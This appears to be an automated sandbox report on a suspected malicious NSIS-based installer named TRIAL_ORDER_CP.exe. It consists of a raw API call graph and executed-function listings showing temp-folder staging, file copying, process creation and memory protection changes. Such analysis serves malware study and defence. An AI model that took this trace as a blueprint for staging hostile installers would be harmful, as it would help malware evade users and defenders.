GetShortPathNameW 2905->2903 2907 4061e8 2905->2907 2908 406235 2906->2908 2907->2899 2907->2903 2926 406044 GetFileAttributesW CreateFileW 2908->2926 2910 406242 2910->2903 2911 406251 GetFileSize GlobalAlloc 2910->2911 2912 406273 2911->2912 2913 406308 CloseHandle 2911->2913 2914 4060c7 ReadFile 2912->2914 2913->2903 2915 40627b 2914->2915 2915->2913 2927 405fa9 lstrlenA 2915->2927 2918 406292 lstrcpyA 2921 4062b4 2918->2921 2919 4062a6 2920 405fa9 4 API calls 2919->2920 2920->2921 2922 4062eb SetFilePointer 2921->2922 2923 4060f6 WriteFile 2922->2923 2924 406301 GlobalFree 2923->2924 2924->2913 2925->2905 2926->2910 2928 405fea lstrlenA 2927->2928 2929 405ff2 2928->2929 2930 405fc3 lstrcmpiA 2928->2930 2929->2918 2929->2919 2930->2929 2931 405fe1 CharNextA 2930->2931 2931->2928 2932->2739 2935 405efd 2933->2935 2936 405eeb 2933->2936 2934 405f21 2934->2742 2934->2743 2935->2934 2938 405e50 CharNextW 2935->2938 2936->2935 2937 405ef8 CharNextW 2936->2937 2937->2934 2938->2935 2939->2765 2940->2794 2949 40601f GetFileAttributesW 2941->2949 2944 405c45 2944->2794 2945 405c33 RemoveDirectoryW 2947 405c41 2945->2947 2946 405c3b DeleteFileW 2946->2947 2947->2944 2948 405c51 SetFileAttributesW 2947->2948 2948->2944 2950 406031 SetFileAttributesW 2949->2950 2951 405c24 2949->2951 2950->2951 2951->2944 2951->2945 2951->2946 2953 403b9f 2952->2953 2954 403b69 2953->2954 2955 403ba4 FreeLibrary GlobalFree 2953->2955 2954->2804 2955->2954 2955->2955 2269 70681058 2271 70681074 2269->2271 2270 706810dd 2271->2270 2273 70681092 2271->2273 2283 706815b6 2271->2283 2274 706815b6 GlobalFree 2273->2274 2275 706810a2 2274->2275 2276 706810a9 GlobalSize 2275->2276 2277 706810b2 2275->2277 2276->2277 2278 706810c8 2277->2278 2279 706810b6 GlobalAlloc 2277->2279 2282 706810d2 GlobalFree 2278->2282 2287 706815dd wsprintfW 2279->2287 2282->2270 2285 706815bc 2283->2285 2284 706815c2 2284->2273 2285->2284 2286 706815ce GlobalFree 2285->2286 2286->2273 2290 70681312 2287->2290 2291 7068131b GlobalAlloc lstrcpynW 2290->2291 2292 706810c7 2290->2292 2291->2292 2292->2278 3062 70681979 3063 7068199c 3062->3063 3064 706819d1 GlobalFree 3063->3064 3065 706819e3 3063->3065 3064->3065 3066 70681312 2 API calls 3065->3066 3067 70681b6e GlobalFree GlobalFree 3066->3067 2293 403fd4 2294 403fec 2293->2294 2295 40414d 2293->2295 2294->2295 2296 403ff8 2294->2296 2297 40415e GetDlgItem GetDlgItem 2295->2297 2316 40419e 2295->2316 2298 404003 SetWindowPos 2296->2298 2299 404016 2296->2299 2300 4044d3 22 API calls 2297->2300 2298->2299 2302 404061 2299->2302 2303 40401f ShowWindow 2299->2303 2304 404188 SetClassLongW 2300->2304 2309 404080 2302->2309 2310 404069 DestroyWindow 2302->2310 2307 40413a 2303->2307 2308 40403f GetWindowLongW 2303->2308 2311 40140b 2 API calls 2304->2311 2305 4041f8 2306 404148 2305->2306 2366 40451f 2305->2366 2405 40453a 2307->2405 2308->2307 2314 404058 ShowWindow 2308->2314 2317 404085 SetWindowLongW 2309->2317 2318 404096 2309->2318 2315 40445c 2310->2315 2311->2316 2312 401389 2 API calls 2319 4041d0 2312->2319 2314->2302 2315->2306 2324 40448d ShowWindow 2315->2324 2316->2305 2316->2312 2317->2306 2318->2307 2322 4040a2 GetDlgItem 2318->2322 2319->2305 2323 4041d4 SendMessageW 2319->2323 2320 40140b 2 API calls 2335 40420a 2320->2335 2321 40445e DestroyWindow EndDialog 2321->2315 2325 4040d0 2322->2325 2326 4040b3 SendMessageW IsWindowEnabled 2322->2326 2323->2306 2324->2306 2328 4040dd 2325->2328 2329 404124 SendMessageW 2325->2329 2330 4040f0 2325->2330 2339 4040d5 2325->2339 2326->2306 2326->2325 2328->2329 2328->2339 2329->2307 2332 4040f8 2330->2332 2333 40410d 2330->2333 2399 40140b 2332->2399 2337 40140b 2 API calls 2333->2337 2334 40410b 2334->2307 2335->2306 2335->2320 2335->2321 2338 4044d3 22 API calls 2335->2338 2357 40439e DestroyWindow 2335->2357 2369 406591 2335->2369 2386 4044d3 2335->2386 2340 404114 2337->2340 2338->2335 2402 4044ac 2339->2402 2340->2307 2340->2339 2342 404285 GetDlgItem 2343 4042a2 ShowWindow KiUserCallbackDispatcher 2342->2343 2344 40429a 2342->2344 2389 4044f5 KiUserCallbackDispatcher 2343->2389 2344->2343 2346 4042cc EnableWindow 2351 4042e0 2346->2351 2347 4042e5 GetSystemMenu EnableMenuItem SendMessageW 2348 404315 SendMessageW 2347->2348 2347->2351 2348->2351 2351->2347 2390 404508 SendMessageW 2351->2390 2391 403fb5 2351->2391 2394 406554 lstrcpynW 2351->2394 2353 404344 lstrlenW 2354 406591 21 API calls 2353->2354 2355 40435a SetWindowTextW 2354->2355 2395 401389 2355->2395 2357->2315 2358 4043b8 CreateDialogParamW 2357->2358 2358->2315 2359 4043eb 2358->2359 2360 4044d3 22 API calls 2359->2360 2361 4043f6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2360->2361 2362 401389 2 API calls 2361->2362 2363 40443c 2362->2363 2363->2306 2364 404444 ShowWindow 2363->2364 2365 40451f SendMessageW 2364->2365 2365->2315 2367 404537 2366->2367 2368 404528 SendMessageW 2366->2368 2367->2335 2368->2367 2373 40659c 2369->2373 2370 4067e3 2371 4067fc 2370->2371 2441 406554 lstrcpynW 2370->2441 2371->2335 2373->2370 2374 4067b4 lstrlenW 2373->2374 2375 4066ad GetSystemDirectoryW 2373->2375 2376 406591 15 API calls 2373->2376 2380 4066c3 GetWindowsDirectoryW 2373->2380 2381 406755 lstrcatW 2373->2381 2383 406591 15 API calls 2373->2383 2385 406725 SHGetPathFromIDListW CoTaskMemFree 2373->2385 2419 406422 2373->2419 2424 406948 GetModuleHandleA 2373->2424 2430 406802 2373->2430 2439 40649b wsprintfW 2373->2439 2440 406554 lstrcpynW 2373->2440 2374->2373 2375->2373 2376->2374 2380->2373 2381->2373 2383->2373 2385->2373 2387 406591 21 API calls 2386->2387 2388 4044de SetDlgItemTextW 2387->2388 2388->2342 2389->2346 2390->2351 2392 406591 21 API calls 2391->2392 2393 403fc3 SetWindowTextW 2392->2393 2393->2351 2394->2353 2397 401390 2395->2397 2396 4013fe 2396->2335 2397->2396 2398 4013cb MulDiv SendMessageW 2397->2398 2398->2397 2400 401389 2 API calls 2399->2400 2401 401420 2400->2401 2401->2339 2403 4044b3 2402->2403 2404 4044b9 SendMessageW 2402->2404 2403->2404 2404->2334 2406 404552 GetWindowLongW 2405->2406 2407 4045fd 2405->2407 2406->2407 2408 404567 2406->2408 2407->2306 2408->2407 2409 404594 GetSysColor 2408->2409 2410 404597 2408->2410 2409->2410 2411 4045a7 SetBkMode 2410->2411 2412 40459d SetTextColor 2410->2412 2413 4045c5 2411->2413 2414 4045bf GetSysColor 2411->2414 2412->2411 2415 4045d6 2413->2415 2416 4045cc SetBkColor 2413->2416 2414->2413 2415->2407 2417 4045f0 CreateBrushIndirect 2415->2417 2418 4045e9 DeleteObject 2415->2418 2416->2415 2417->2407 2418->2417 2442 4063c1 2419->2442 2422 406456 RegQueryValueExW RegCloseKey 2423 406486 2422->2423 2423->2373 2425 406964 2424->2425 2426 40696e GetProcAddress 2424->2426 2446 4068d8 GetSystemDirectoryW 2425->2446 2428 40697d 2426->2428 2428->2373 2429 40696a 2429->2426 2429->2428 2437 40680f 2430->2437 2431 406885 2432 40688a CharPrevW 2431->2432 2434 4068ab 2431->2434 2432->2431 2433 406878 CharNextW 2433->2431 2433->2437 2434->2373 2436 406864 CharNextW 2436->2437 2437->2431 2437->2433 2437->2436 2438 406873 CharNextW 2437->2438 2449 405e50 2437->2449 2438->2433 2439->2373 2440->2373 2441->2371 2443 4063d0 2442->2443 2444 4063d9 RegOpenKeyExW 2443->2444 2445 4063d4 2443->2445 2444->2445 2445->2422 2445->2423 2447 4068fa wsprintfW LoadLibraryExW 2446->2447 2447->2429 2450 405e56 2449->2450 2451 405e6c 2450->2451 2452 405e5d CharNextW 2450->2452 2451->2437 2452->2450 3074 7068103d 3077 7068101b 3074->3077 3078 706815b6 GlobalFree 3077->3078 3079 70681020 3078->3079 3080 70681024 3079->3080 3081 70681027 GlobalAlloc 3079->3081 3082 706815dd 3 API calls 3080->3082 3081->3080 3083 7068103b 3082->3083 2453 70682a7f 2454 70682acf 2453->2454 2455 70682a8f VirtualProtect 2453->2455 2455->2454 3087 402fb8 3088 402fe3 3087->3088 3089 402fca SetTimer 3087->3089 3090 403038 3088->3090 3091 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3088->3091 3089->3088 3091->3090 2456 70681774 2457 706817a3 2456->2457 2480 70681bff 2457->2480 2459 706817aa 2460 706817bd 2459->2460 2461 706817b1 2459->2461 2462 706817e4 2460->2462 2463 706817c7 2460->2463 2464 70681312 2 API calls 2461->2464 2467 706817ea 2462->2467 2468 7068180e 2462->2468 2466 706815dd 3 API calls 2463->2466 2465 706817bb 2464->2465 2470 706817cc 2466->2470 2471 70681654 3 API calls 2467->2471 2469 706815dd 3 API calls 2468->2469 2469->2465 2514 70681654 2470->2514 2473 706817ef 2471->2473 2475 70681312 2 API calls 2473->2475 2477 706817f5 GlobalFree 2475->2477 2476 70681312 2 API calls 2478 706817d8 CloseHandle 2476->2478 2477->2465 2479 70681809 GlobalFree 2477->2479 2478->2465 2479->2465 2519 706812bb GlobalAlloc 2480->2519 2482 70681c26 2520 706812bb GlobalAlloc 2482->2520 2484 70681e6b GlobalFree GlobalFree GlobalFree 2486 70681e88 2484->2486 2500 70681ed2 2484->2500 2485 70681c31 2485->2484 2488 70681d26 GlobalAlloc 2485->2488 2489 706821ae 2485->2489 2491 70681d71 lstrcpyW 2485->2491 2492 70681d8f GlobalFree 2485->2492 2495 70681d7b lstrcpyW 2485->2495 2499 70682126 2485->2499 2485->2500 2506 70682067 GlobalFree 2485->2506 2508 706812cc 2 API calls 2485->2508 2509 70681dcd 2485->2509 2487 7068227e 2486->2487 2496 70681e9d 2486->2496 2486->2500 2490 706822a0 GetModuleHandleW 2487->2490 2487->2500 2488->2485 2489->2500 2511 70682216 lstrcpyW 2489->2511 2493 706822b1 LoadLibraryW 2490->2493 2494 706822c6 2490->2494 2491->2495 2492->2485 2493->2494 2493->2500 2527 706816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2494->2527 2495->2485 2496->2500 2523 706812cc 2496->2523 2498 706822d8 2501 70682318 2498->2501 2512 70682302 GetProcAddress 2498->2512 2526 706812bb GlobalAlloc 2499->2526 2500->2459 2501->2500 2503 70682325 lstrlenW 2501->2503 2528 706816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2503->2528 2506->2485 2507 7068233f 2507->2500 2508->2485 2509->2485 2521 7068162f GlobalSize GlobalAlloc 2509->2521 2511->2500 2512->2501 2513 7068212f 2513->2459 2530 706812bb GlobalAlloc 2514->2530 2516 70681659 2531 70681666 2516->2531 2519->2482 2520->2485 2522 7068164d 2521->2522 2522->2509 2529 706812bb GlobalAlloc 2523->2529 2525 706812db lstrcpynW 2525->2500 2526->2513 2527->2498 2528->2507 2529->2525 2530->2516 2532 7068169f lstrcpyW 2531->2532 2535 70681672 wsprintfW 2531->2535 2536 70681663 2532->2536 2535->2536 2536->2476 2956 70681817 2957 7068184a 2956->2957 2958 70681bff 22 API calls 2957->2958 2959 70681851 2958->2959 2960 70681976 2959->2960 2961 70681869 2959->2961 2962 70681862 2959->2962 2998 70682480 2961->2998 3014 7068243e 2962->3014 2967 706818cd 2973 7068191e 2967->2973 2974 706818d3 2967->2974 2968 706818af 3027 70682655 2968->3027 2969 70681898 2983 7068188e 2969->2983 3024 70682e23 2969->3024 2970 7068187f 2972 70681885 2970->2972 2977 70681890 2970->2977 2972->2983 3008 70682b98 2972->3008 2975 70682655 10 API calls 2973->2975 2979 70681666 2 API calls 2974->2979 2981 7068190f 2975->2981 2976 706818b5 2982 70681654 3 API calls 2976->2982 3018 70682810 2977->3018 2985 706818f0 2979->2985 2997 70681965 2981->2997 3038 70682618 2981->3038 2986 706818bb 2982->2986 2983->2967 2983->2968 2988 70682655 10 API calls 2985->2988 2989 70681312 2 API calls 2986->2989 2987 70681896 2987->2983 2988->2981 2991 706818c1 GlobalFree 2989->2991 2991->2981 2992 7068196f GlobalFree 2992->2960 2994 70681951 2996 706815dd 3 API calls 2994->2996 2994->2997 2995 7068194a FreeLibrary 2995->2994 2996->2997 2997->2960 2997->2992 3005 70682498 2998->3005 3000 706825c1 GlobalFree 3003 7068186f 3000->3003 3000->3005 3001 7068256b GlobalAlloc CLSIDFromString 3001->3000 3002 70682540 GlobalAlloc WideCharToMultiByte 3002->3000 3003->2969 3003->2970 3003->2983 3004 706812cc GlobalAlloc lstrcpynW 3004->3005 3005->3000 3005->3001 3005->3002 3005->3004 3007 7068258a 3005->3007 3042 7068135a 3005->3042 3007->3000 3046 706827a4 3007->3046 3009 70682baa 3008->3009 3010 70682c4f CreateFileA 3009->3010 3013 70682c6d 3010->3013 3012 70682d39 3012->2983 3049 70682b42 3013->3049 3015 70682453 3014->3015 3016 7068245e GlobalAlloc 3015->3016 3017 70681868 3015->3017 3016->3015 3017->2961 3022 70682840 3018->3022 3019 706828db GlobalAlloc 3023 706828fe 3019->3023 3020 706828ee 3021 706828f4 GlobalSize 3020->3021 3020->3023 3021->3023 3022->3019 3022->3020 3023->2987 3026 70682e2e 3024->3026 3025 70682e6e GlobalFree 3026->3025 3053 706812bb GlobalAlloc 3027->3053 3029 706826d8 MultiByteToWideChar 3035 7068265f 3029->3035 3030 706826fa StringFromGUID2 3030->3035 3031 7068270b lstrcpynW 3031->3035 3032 7068271e wsprintfW 3032->3035 3033 70682742 GlobalFree 3033->3035 3034 70682777 GlobalFree 3034->2976 3035->3029 3035->3030 3035->3031 3035->3032 3035->3033 3035->3034 3036 70681312 2 API calls 3035->3036 3054 70681381 3035->3054 3036->3035 3039 70681931 3038->3039 3040 70682626 3038->3040 3039->2994 3039->2995 3040->3039 3041 70682642 GlobalFree 3040->3041 3041->3040 3043 70681361 3042->3043 3044 706812cc 2 API calls 3043->3044 3045 7068137f 3044->3045 3045->3005 3047 70682808 3046->3047 3048 706827b2 VirtualAlloc 3046->3048 3047->3007 3048->3047 3050 70682b4d 3049->3050 3051 70682b5d 3050->3051 3052 70682b52 GetLastError 3050->3052 3051->3012 3052->3051 3053->3035 3055 7068138a 3054->3055 3056 706813ac 3054->3056 3055->3056 3057 70681390 lstrcpyW 3055->3057 3056->3035 3057->3056

                                          Executed Functions

                                          Function 0040352F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464stringfilecomCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 12 403616 5->12 7 403622-403636 call 4068d8 lstrlenA 6->7 13 403638-403654 call 406948 * 3 7->13 12->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 26 40365e 21->26 26->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 39 403703-403708 36->39 40 403709-40370d 36->40 44 403873-40388d DeleteFileW call 4030a2 37->44 45 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->45 39->40 42 403713-403719 40->42 43 4037ce-4037dd call 405e50 40->43 47 403733-40376c 42->47 48 40371b-403722 42->48 43->32 61 4037df-4037e0 43->61 66 403893-403899 44->66 67 403a7a-403a8a call 403b4c OleUninitialize 44->67 45->44 64 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 45->64 49 403789-4037c3 47->49 50 40376e-403773 47->50 54 403724-403727 48->54 55 403729 48->55 58 4037c5-4037c9 49->58 59 4037cb-4037cd 49->59 50->49 56 403775-40377d 50->56 54->47 54->55 55->47 62 403784 56->62 63 40377f-403782 56->63 58->59 65 4037ef-4037fc call 406554 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 403932-403939 call 403c26 66->70 71 40389f-4038aa call 405e50 66->71 78 403ab0-403ab6 67->78 79 403a8c-403a9c call 405bb4 ExitProcess 67->79 77 40393e-403942 70->77 81 4038f8-403902 71->81 82 4038ac-4038e1 71->82 77->67 83 403b34-403b3c 78->83 84 403ab8-403ace GetCurrentProcess OpenProcessToken 78->84 89 403904-403912 call 405f2b 81->89 90 403947-40396d call 405b1f lstrlenW call 406554 81->90 86 4038e3-4038e7 82->86 91 403b42-403b46 ExitProcess 83->91 92 403b3e 83->92 87 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b04-403b12 call 406948 84->88 94 4038f0-4038f4 86->94 95 4038e9-4038ee 86->95 87->88 104 403b20-403b2b ExitWindowsEx 88->104 105 403b14-403b1e 88->105 89->67 106 403918-40392e call 406554 * 2 89->106 110 40397e-403996 90->110 111 40396f-403979 call 406554 90->111 92->91 94->86 99 4038f6 94->99 95->94 95->99 99->81 104->83 108 403b2d-403b2f call 40140b 104->108 105->104 105->108 106->70 108->83 116 40399b-40399f 110->116 111->110 118 4039a4-4039ce wsprintfW call 406591 116->118 122 4039d0 call 405aa8 118->122 123 4039d7 call 405b02 118->123 127 4039d5 122->127 126 4039dc-4039de 123->126 128 4039e0-4039ea GetFileAttributesW 126->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 126->129 127->126 130 403a0b-403a16 128->130 131 4039ec-4039f5 DeleteFileW 128->131 137 403a78 129->137 138 403a3b-403a55 call 406314 call 406591 call 405b37 129->138 130->116 134 403a18 130->134 131->130 133 4039f7-403a09 call 405c60 131->133 133->118 133->130 134->67 137->67 145 403a5a-403a5c 138->145 146 403aa2-403aae CloseHandle 145->146 147 403a5e-403a68 145->147 146->137 147->137 148 403a6a-403a72 call 4068b1 147->148 148->118 148->137
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403552
                                          • GetVersionExW.KERNEL32(?), ref: 0040357D
                                          • GetVersionExW.KERNEL32(?), ref: 00403590
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403629
                                          • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403666
                                          • OleInitialize.OLE32(00000000), ref: 0040366D
                                          • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                          • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004036A1
                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000020,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DA
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,0000000C,?,00000008,0000000A,0000000C), ref: 00403812
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 00403823
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 0040382F
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 00403843
                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040384B
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 0040385C
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403864
                                          • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403878
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",00000000,0000000A), ref: 00403951
                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                          • wsprintfW.USER32 ref: 004039AE
                                          • GetFileAttributesW.KERNEL32(964,C:\Users\user\AppData\Local\Temp\,964,?), ref: 004039E1
                                          • DeleteFileW.KERNEL32(964), ref: 004039ED
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,964,?), ref: 00403A1B
                                            • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005,00405E12,?,00000000,000000F1,?,?,?,?,?), ref: 0040631E
                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,964,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A31
                                            • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                            • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                            • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                          • OleUninitialize.OLE32(0000000A,?,00000008,0000000A,0000000C), ref: 00403A7F
                                          • ExitProcess.KERNEL32 ref: 00403A9C
                                          • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,964,00000000), ref: 00403AA3
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403ABF
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403AC6
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AFE
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                          • ExitProcess.KERNEL32 ref: 00403B46
                                            • Part of subcall function 00405B02: CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$1033$964$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Crumbliness$C:\Users\user\Desktop$C:\Users\user\Desktop\TRIAL_ORDER_CP.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                          • API String ID: 1813718867-874832502
                                          • Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
                                          • Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
                                          • Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E
                                          Function 70681BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 706812BB: GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70681D2D
                                          • lstrcpyW.KERNEL32(00000008,?), ref: 70681D75
                                          • lstrcpyW.KERNEL32(00000808,?), ref: 70681D7F
                                          • GlobalFree.KERNEL32(00000000), ref: 70681D92
                                          • GlobalFree.KERNEL32(?), ref: 70681E74
                                          • GlobalFree.KERNEL32(?), ref: 70681E79
                                          • GlobalFree.KERNEL32(?), ref: 70681E7E
                                          • GlobalFree.KERNEL32(00000000), ref: 70682068
                                          • lstrcpyW.KERNEL32(?,?), ref: 70682222
                                          • GetModuleHandleW.KERNEL32(00000008), ref: 706822A1
                                          • LoadLibraryW.KERNEL32(00000008), ref: 706822B2
                                          • GetProcAddress.KERNEL32(?,?), ref: 7068230C
                                          • lstrlenW.KERNEL32(00000808), ref: 70682326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                          • String ID:
                                          • API String ID: 245916457-0
                                          • Opcode ID: 572b017e4070f938d6ca582d07f2ea793650e4cfac0da41ee6d8a9124a715d36
                                          • Instruction ID: 7e2dcd10869732d7a638db38e09a17f9843e4f9e9e25429a5a96dd7128a81757
                                          • Opcode Fuzzy Hash: 572b017e4070f938d6ca582d07f2ea793650e4cfac0da41ee6d8a9124a715d36
                                          • Instruction Fuzzy Hash: C6228EB1D00606DFCB118FA4C9A46EEB7F9FF08315F20452ED6A6EA2D0D7B45A81DB50
                                          Function 00405C60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
